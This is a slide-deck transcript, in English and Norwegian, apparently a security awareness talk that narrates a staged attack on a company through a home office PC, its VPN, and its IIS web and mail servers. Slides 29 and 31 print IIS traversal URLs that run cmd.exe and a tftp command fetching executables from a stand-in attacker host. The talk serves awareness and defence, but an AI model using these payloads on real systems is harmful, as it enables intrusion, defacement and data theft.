The attack
description
Transcript of The attack
![Page 1: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/1.jpg)
The attack
Ronny Windvik
Kjetil Mosesen
![Page 2: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/2.jpg)
Agenda
• Security issues
• Scenario for the attack
• The attack
![Page 3: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/3.jpg)
Attacker’s goal
All networks/computers are on the Internet
”We wish to attack an organisation and our aim is financial gain ”
![Page 4: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/4.jpg)
Anonymity on the Internet, TOR (The Onion
Router)
![Page 5: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/5.jpg)
Onion Routing
Onion Routing is a distributed overlay network designed to anonymize TCP-based applications like web browsing, secure shell, and instant messaging.
Clients choose a path through the network and build a circuit, in which each node (or “onion router” or “OR”) in the path knows its predecessor and successor, but no other nodes in the circuit.
Traffic flows down the circuit in fixed-size cells, which are unwrapped by a symmetric key at each node (like the layers of an onion) and relayed downstream.
• http://en.wikipedia.org/wiki/Onion_Routing
![Page 6: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/6.jpg)
Scenario
• Localisation of home office computers in the company– Is done through a proxy server and a webserver in Sweden
• Paying a script kiddie to install a rootkit on selected home computers?– Script kiddie: A person who attacks computer systems
using ready made scripts. – Uses an anonymous network: allows you to connect into our
network and do all your internet activities from our network. Think of it like coming into our "internet cafe" and using one of our computers. Anything you do does not reveal your identity because you are doing all your internet activities like web surfing from our computers, not yours
• The script kiddis uses a rootkit and an open VPN-tunnel in to the company for the attack
![Page 7: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/7.jpg)
Protection of the home computer
– Firewall• Router with Firewall and NAT
– Direct acess to the computer• Modem• Broadband router with no firewall
– In this case, the home computer can be accessed from the Internet
![Page 8: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/8.jpg)
Starting point
![Page 9: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/9.jpg)
The attack on a selected company
• Information collecting rendering e-mail addresses• Picking out internal and external IP-adresses
– Search for open unprotected services– Take over the home computer end install a rootkit
• Find teh VPN-connection to the company – Collect information in the company’s domain– Access confidential information/documents – for further
sale/blackmail– Take over a linux server in the company – send out Spam – Take over the company’s web server – Install rootkits wherever possible– Place evidence so the employer gets the blame
![Page 10: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/10.jpg)
Information collection
• Webpages• DNS• News groups• IP-range (www.ripe.net)• What we get:
– A set of valid e-mail addresses in the company– The IP-range– The Mappingen between IP-adresses and computer names
![Page 11: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/11.jpg)
Information is collected on the attacker’s web server
• Alle som åpner e-posten kontakter automatisk vår webtjener
• Innholder en logg med alle IP-adresser som besøker den
• Slår opp IP-adressene for å finne ut hvilke som tilhører bredbåndsleverandører
• Vet også hvilke brukernavn/e-postnavn som tilhører hvilke IP-adresse
[email protected] 192.168.44.23
[email protected] 10.0.0.1
[email protected] 192.168.56.3
[email protected] 192.168.32.6
Hjemme PC
![Page 12: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/12.jpg)
Information collection, IP-adresses
![Page 13: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/13.jpg)
Charting use of home PC
• Ønsker å finne ut når hjemme PC-en er i bruk– Utføres via proxy i Sverige
• Hver IP-pakke har et ”Identification” på 16-bit• Benyttes til å fragmentere/dele opp IP-pakker• Alle fragmenter av en IP-pakke med ID=X får også ID=X
ID = 1313
ID=1313 ID=1313 ID=1313ID=1313 ID=1313 ID=1313
ID = 1313
![Page 14: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/14.jpg)
Charting use of home PC
ADSL
0,000E+00
2,000E+08
4,000E+08
6,000E+08
8,000E+08
1,000E+09
1,200E+09
1,400E+09
00:00 04:48 09:36 14:24 19:12 00:00 04:48
Tid
Byt
es in
n e
stim
ert
Pakker fra/til ruter
![Page 15: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/15.jpg)
The script kiddie
• Benytter en script-kiddie til å ta over hjemme PC-en
• Script-kiddie jobber via anonymiseringsnettverket
• Hjemme PC-en er ikke beskyttet av en brannmur
Innleid hjelp
![Page 16: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/16.jpg)
Active information collection with NMAP
Innleid hjelp
![Page 17: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/17.jpg)
Nmap ("Network Mapper")
• Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing.
• It was designed to rapidly scan large networks, although it works fine against single hosts.
• Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
• Nmap runs on most types of computers and both console and graphical versions are available.
• Nmap is free software, available with full source code under the terms of the GNU GPL.
![Page 18: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/18.jpg)
Active information collectionNetBIOS
• Avslører hvem som er logget inn og medlemskap i domene
Innleid hjelp
![Page 19: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/19.jpg)
Takes over home office client
Innleid hjelp
![Page 20: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/20.jpg)
Rootkits, leaving back doors
– Programs• Skjermsparere, fildelingsprogrammer, …• Java Scripts, Applets, Active X,...
– Modifiserte systemkommandoer • dir, ps, who, ifconfig, su, login, net, …
– Kernel rootkit• Lastbare kjernemoduler, (IPSec-modul)• Device drivere
![Page 21: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/21.jpg)
Installing a rootkit on the home computer
• The script kiddie installs a rootkit on the home computer
• Rootkit aktiveres ved å sende en ICMP-echo-reply eller -time– Åpner da en port for å gi tilgang til hjemme PC-en– Kan også sette hjemme PC-en til å kontakte oss– All trafikk er kryptert– Returnerer et cmd-vindu til oss
• Rootkit er passordbeskyttet og ikke synlig i noen logger på hjemme PC-en
• Den innleide script-kiddie er nå ferdig med sin del
Innleid hjelp
![Page 22: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/22.jpg)
Script-kiddie takes over home computer
![Page 23: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/23.jpg)
Sees a VPN-tunnel defined in Windows
![Page 24: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/24.jpg)
Tests VPN tunnel
![Page 25: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/25.jpg)
Damage done
• Har utnyttet tilliten til hjemmekontor PC-en i bedriften sitt domene
• Har samlet inn mye bedriftsinterne dokumenter
• Informasjonen kan selges til konkurrenter, aksjespekulanter eller andre som mulighet for utpressing
![Page 26: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/26.jpg)
Collecting document
![Page 27: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/27.jpg)
Attack on company’s web server
• Betingelser– Web-tjeneren/serveren er en Windows maskin
– Kjører Internet Information Server (IIS) (web-tjeneren til Microsoft)
– Har ikke installert patchene for feilene/sikkerhetshullene vi skal utnytte
![Page 28: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/28.jpg)
Security holes
1. Bug in IIS– Kan få kjørt de fleste programmer på web-tjeneren– Eksternt
2. Faulty access rights
Kan få kjørt programmer som Administrator– Lokalt
![Page 29: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/29.jpg)
Bug in IIS (BID 2708)
• Internet Information Services - a powerful Web server
• Hvordan få startet og kjørt programmer på web-tjeneren ?
• http://www/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+ tftp –i hacker_box.com GET FIL.exe C:\temp\FIL.exe
• http://www/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+ rename min-fil.htm C:\inetpub\wwwroot\default.htm
• http://www.hackingspirits.com/eth-hac/papers/iis_uni.html
![Page 30: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/30.jpg)
Faults in controlling access rights
• How to run programs as Administrator ?
• Utnytter en feil i hvordan prosesser/programmer internt i en Windows maskin kommuniserer
– Forenklet sagt spoofer vi også her avsenderen, ved å kjøre et program kalt HK.EXE
– For programmet som mottar, vil det alltid se ut som om det er et program med Administratorrettigheter som er avsender
![Page 31: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/31.jpg)
Changing the web server
www angriperStart tftp, og send med parameterene
tftp –i GET /tftp-dir/HK.exe c:\inetpub\wwwroot\HK.exe
Hk.exe Default.htm
Ulovlig innhold
![Page 32: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/32.jpg)
Changing the web server
www angriperKjør HK.exe (gir Administrator rettigheter)
Legg nedlastet fil som hjemmeside
Se på den nye hjemmesiden
![Page 33: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/33.jpg)
Changing the web server
![Page 34: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/34.jpg)
Attackin the comapny’s e-mail server
• E-posttjeneren viser seg å være sårbar for et Samba exploit• Gir oss root rettigheter
![Page 35: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/35.jpg)
Taking over e-mail server, sending SPAM
![Page 36: The attack](https://reader036.fdocuments.in/reader036/viewer/2022062322/5681469f550346895db3b6f0/html5/thumbnails/36.jpg)
What happened
• Kartlagt hjemmekontorbrukere for en utvalgt bedrift• Leid inn en script-kiddie til å overta hjemmekontor PC-en• Brukt tillit hjemmekontor PC-en har til å komme inn i bedriften• Samlet inn bedriftsinterne dokumenter• Overtatt webtjener og lagt ut ulovlig innhold• Overtatt e-posttjeneren og sendt ut mye SPAM
• Mye gjort via anonymiseringsnettverk• Men, ikke alt…